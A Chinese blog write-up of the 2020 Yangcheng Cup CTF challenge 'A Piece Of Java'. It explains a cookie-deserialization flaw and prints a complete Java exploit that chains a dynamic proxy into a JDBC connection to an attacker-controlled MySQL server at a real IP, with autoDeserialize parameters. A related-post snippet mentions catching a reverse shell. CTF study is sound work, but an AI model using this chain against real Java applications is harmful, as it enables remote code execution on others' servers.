[羊城杯 2020]A Piece Of Java

已于 2022-01-26 18:20:35 修改
阅读量2.3k 收藏
点赞数 2
分类专栏: ctfwp 文章标签: java ctf
于 2022-01-26 18:17:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fmyyy1/article/details/122706761
版权

[羊城杯 2020]A Piece Of Java

源码逻辑不难,在hello路由对设置cookie键名为data进行反序列化

1643187783467.png

问题是用的是seriakiller进行的反序列化,并且用的白名单限制。

1643187950800.png

虽然题目自带了CC但是因为这个设置没法直接用。

看一下题目给的条件,有个InfoInvocationHandler

package gdufs.challenge.web.invocation;

import gdufs.challenge.web.model.Info;
import java.io.Serializable;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Method;

public class InfoInvocationHandler implements InvocationHandler, Serializable {
    private Info info;

    public InfoInvocationHandler(Info info) {
        this.info = info;
    }

    public Object invoke(Object proxy, Method method, Object[] args) {
        try {
            if (method.getName().equals("getAllInfo") &&
                    !this.info.checkAllInfo().booleanValue())
                return null;
            return method.invoke(this.info, args);
        } catch (Exception e) {
            e.printStackTrace();
            return null;
        }
    }
}

这个invoke肯定是能利用的,关键就在这

1643191436243.png

回到刚刚的hello路由,反序列化之后调用了info.getAllInfo()

   Info info = (Info)deserialize(cookieData);
    if (info != null)
      model.addAttribute("info", info.getAllInfo());

再看给的DatabaseInfo类

1643191652415.jpeg

所以思路很明确,利用动态代理触发InfoInvocationHandler的invoke方法,之后触发connect进行jdbc反序列化

调用链

反序列化->info.getAllinfo()->(动态代理)InfoInvocationHandler.invoke()->Databaseinfo.checkAllInfo()->Databaseinfo->connect()

这里最开始想的是利用恶意mysql读文件的,但貌似某个配置没开所以没成功。

写exp

package YCB2020;

import gdufs.challenge.web.invocation.InfoInvocationHandler;
import gdufs.challenge.web.model.DatabaseInfo;
import gdufs.challenge.web.model.Info;
import org.nibblesec.tools.SerialKiller;

import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Proxy;
import java.util.Base64;

public class exp {
    public static void setFieldValue(Object obj, String fieldname, Object value) throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldname);
        field.setAccessible(true);
        field.set(obj,value);
    }
//    public static void unserialize(byte[] bytes) throws Exception{
//        try(ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
//            ObjectInputStream oin = new ObjectInputStream(bain)){
//            oin.readObject();
//        }
//    }
    public static Object unserialize(byte[] bytes) throws Exception{
        Object obj;
        try(ByteArrayInputStream bain = new ByteArrayInputStream(bytes);
            ObjectInputStream oin = new ObjectInputStream(bain)){
            obj = oin.readObject();
            return obj;
        }
    }
    public static byte[] serialize(Object o) throws Exception{
        try(ByteArrayOutputStream baout = new ByteArrayOutputStream();
            ObjectOutputStream oout = new ObjectOutputStream(baout)){
            oout.writeObject(o);
            return baout.toByteArray();
        }
    }

//    private static Object deserialize(String base64data) {
//        Object obj;
//        ByteArrayInputStream bais = new ByteArrayInputStream(Base64.getDecoder().decode(base64data));
//        try {
//            SerialKiller serialKiller = new SerialKiller(bais, "/Users/fmyyy/tools/serialkiller.conf");
//            obj = serialKiller.readObject();
//            serialKiller.close();
//        } catch (Exception e) {
//            e.printStackTrace();
//            return null;
//        }
//        return obj;
//    }


    public static void main(String[] args) throws Exception {
        Info databaseInfo = new DatabaseInfo();
        setFieldValue(databaseInfo, "host", "47.101.176.40");
        setFieldValue(databaseInfo, "port", "33060");
        setFieldValue(databaseInfo, "username", "fmyyy");
        setFieldValue(databaseInfo, "password", "fmyyy&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor");
        Class clazz = Class.forName("gdufs.challenge.web.invocation.InfoInvocationHandler");
        Constructor construct = clazz.getDeclaredConstructor(Info.class);
        construct.setAccessible(true);
//        System.out.println("123");
        InfoInvocationHandler handler = (InfoInvocationHandler) construct.newInstance(databaseInfo);
        Info proxinfo = (Info) Proxy.newProxyInstance(Info.class.getClassLoader(), new Class[] {Info.class}, handler);
        byte[] bytes = serialize(proxinfo);
        byte[] payload = Base64.getEncoder().encode(bytes);
        System.out.print(new String(payload));
//        Info info1 = (Info)deserialize(new String(payload));
//        info1.getAllInfo();
    }
}

恶意mysql和jdbc反序列化的利用参考https://ego00.blog.csdn.net/article/details/120963327

1643192103414.png

1643192087124.png

fmyyy1
关注
专栏目录
[羊城 2020]easyser - 反序列化+SSRF+伪协议(绕过死亡die)
oZuoShen123的博客
10-08 1049
F12看提示: 小胖说用个不安全的协议从我家才能进ser.php呢! ! 意思就是http协议就能进ser.php,回顾一下http协议咋用的?……
BUUCTF[羊城2020]easyphp
snowlyzz的博客
08-21 826
刷题记录
[羊城 2020]a_piece_of_java
qq_62046696的博客
05-07 1175
首先jd-gui进行反编译简单查看发现有用的类就两个一个是MainContrller.class和InfoInvocationHandler.class分析有二个路由:/index: post传参输入账号密码,存入名为data的cookie中序列化,然后赋值一个maxage/hello就是把cookie反序列化这里不满足if条件,就会执行我们的invoke方法。目前思路 序列化传参cookie->反序列化cookie->调用invoke方法->找一条链子。
从一道题来看JDBC反序列化漏洞([羊城-2020]A-Piece-Of-Java)
qq_42585535的博客
04-19 873
本文从一道题目来分析JDBC反序列化漏洞及利用
[羊城 2020]a_piece_of_java 刷题记录
最新发布
uuzeray的博客
04-15 543
反序列化->info.getAllinfo()->(动态代理)InfoInvocationHandler.invoke()->Databaseinfo.checkAllInfo()->Databaseinfo->connect()利用点在/hello路由,在cookieData处打入反序列化。这题考的是JDBC_Attack,可以自行看下面文章。MySQL_Fake_Server配置改下。但定义了白名单输入流,不能直接打CC链。然后有spring依赖,可以打CC。监听,反弹shell,拿flag。
[羊城 2020]EasySer
SopRomeo的博客
05-22 3304
这题出的挺离谱的,记一下 进去是这个页面,扫一波目录,得到robots.txt,又得到/star1.php 尝试ssrf访问 <?php error_reporting(0); if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) { highlight_file(__FILE__); } $flag='{Trump_:"fake_news!"}'; class GWHT{ public $hero; public functi
2020YCBCTF羊城官方Writeup.pdf
10-28
标题《2020YCBCTF羊城官方Writeup.pdf》中的“YCBCTF”指的是一种名为“羊城”的网络安全竞赛(CTF),这是一个以网络安全为主题的竞赛,CTF全称Capture The Flag,即“夺旗赛”,是一种信息安全竞赛活动。...
2020YCBCTF:2020羊城官方writeup及
03-24
20202020羊城官方writeup及源码 各个过渡的分散的writeup后续会逐步上传,所有转移的writeup已经汇总在wp文件夹下的writeup文件里面了!
羊城_2020_babyre 题解
lifanxin的博客
09-09 1258
babyre题目信息考查知识题目分析WP脚本总结 题目信息   本题目来自于2020羊城的逆向题,可以在buuoj上找到题目复现。 考查知识   本题目考查的知识点有:DES/AES算法,SMC自修改代码,以及合理利用动态调试来快速解题。   关于动态调试,这里很多人可能会遇到环境问题,主要是因为题目调用了openssl的动态加密算法库,所以本地也得有一个。同时还需要注意openssl加密算法库的版本问题,该题目必须使用libcrypto.so.1.0.0。这里我给出该算法库文件 – libcrypto
2020羊城CTF随缘Writeup
sash1mi
01-09 3776
2020羊城CTF随缘Writeup docker源码链接: https://github.com/k3vin-3/YCBCTF2020 Web部分 a_piece_of_java 考点:源码审计、java反序列化 PS:这道题没整明白,直接给出官方WP 第一步,serialkiller 白名单过滤,构造动态代理触发 JDBC 连接: DatabaseInfo databaseInfo = new DatabaseInfo(); databaseInfo.setHost("x.x.x.x"); datab
[羊城 2020]login [SUCTF2019]hardcpp
寻梦&之璐
06-03 6669
文章目录[羊城 2020]login思路:一个py编译的exe,需要解包,然后反编译成py文件1.解包:python pyinstxtractor.py login.exe提示:pyinstxtractor.py这玩意github 上很多,随便找2.进入文件夹,然后进行login版本hex填充用编辑工具010打开login和struct,进行对比,main前面缺少几个字节,我们直接将struct前面的几个字节复制到main上面去,再将login保存为pyc格式文件3.uncompyle6 login.py
简单的JDBC反序列化复现
qq_43936524的博客
05-07 4708
文章目录漏洞环境复现代码客户端脚本启动服务器MySQL_Fake_Server服务器 漏洞环境 jdk 1.8.152 需要的依赖库commons-collections 3.1作为本地Gadget JDBC利用采用8.0的版本 <dependencies> <dependency> <groupId>mysql</groupId> <artifactId>mysql-connector-java&l
从Mysql流量分析入手来一步步搭建JDBC反序列化利用的恶意Mysql服务
qq_42585535的博客
04-29 943
利用恶意mysql来进行JDBC反序列化漏洞的利用,这一次,我们试图自己来搭建一个mysql
ctfd批量上web题目脚本
fjh1997的博客
07-08 1158
import requests r = requests.get('https://hub.docker.com/v2/repositories/ctftraining/?page_size=88') challenges=[] f=open("challenge.sql","w+") q=open("pull.sh","w+") f.write("set character_set_client='utf8mb4';\nset character_set_connection='utf8mb4';\nse
java反序列化基础知识笔记
qq_43936524的博客
05-08 736
文章目录parse(),parseObject()的区别 parse(),parseObject()的区别
2020羊城、第六届工控比赛部分题目复现
m0re's blog
09-17 2680
本文目录羊城easyconBlackCat工控签到ICS_1ICS_4ICS_10ICS_12 羊城 easycon 环境打开 dirsearch扫描得到两个可以访问的文件 一个是index.html、另一个是index.php访问index.php会有个弹窗,看到 题目中提示菜刀。所以猜测这个是连接密码。 使用蚁剑连接,成功连接。 但是,那个bbbbbbb.txt没有flag,是base64转图片,使用在线网站可以直接转换得到图片,这个是需要加上一个头的,缺少图片头的格式。 BlackCa
2020-12-20----java表白
qq_44494957的博客
12-20 180
目录自动打开记事本向记事本中填充文字打包运行注意 自动打开记事本 runtime 单例模式 向记事本中填充文字 使用字符流将文件中的内容读取到內存之后 将读取数据放入剪切板中,然后粘贴到文件中 // A code block package com.bjpowernode; import javazoom.jl.decoder.JavaLayerException; import javazoom.jl.player.Player; import java.io.File; import java.i
羊城2020 wp
08-18
羊城2020是一场年度的电子竞技赛事,为广大电竞爱好者提供了一个展示技术和激发激情的舞台。今年的羊城聚集了来自全国各地的顶尖电竞选手,他们在各个游戏项目中展现了高水平的操作和战术。 在比赛的文化氛围...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值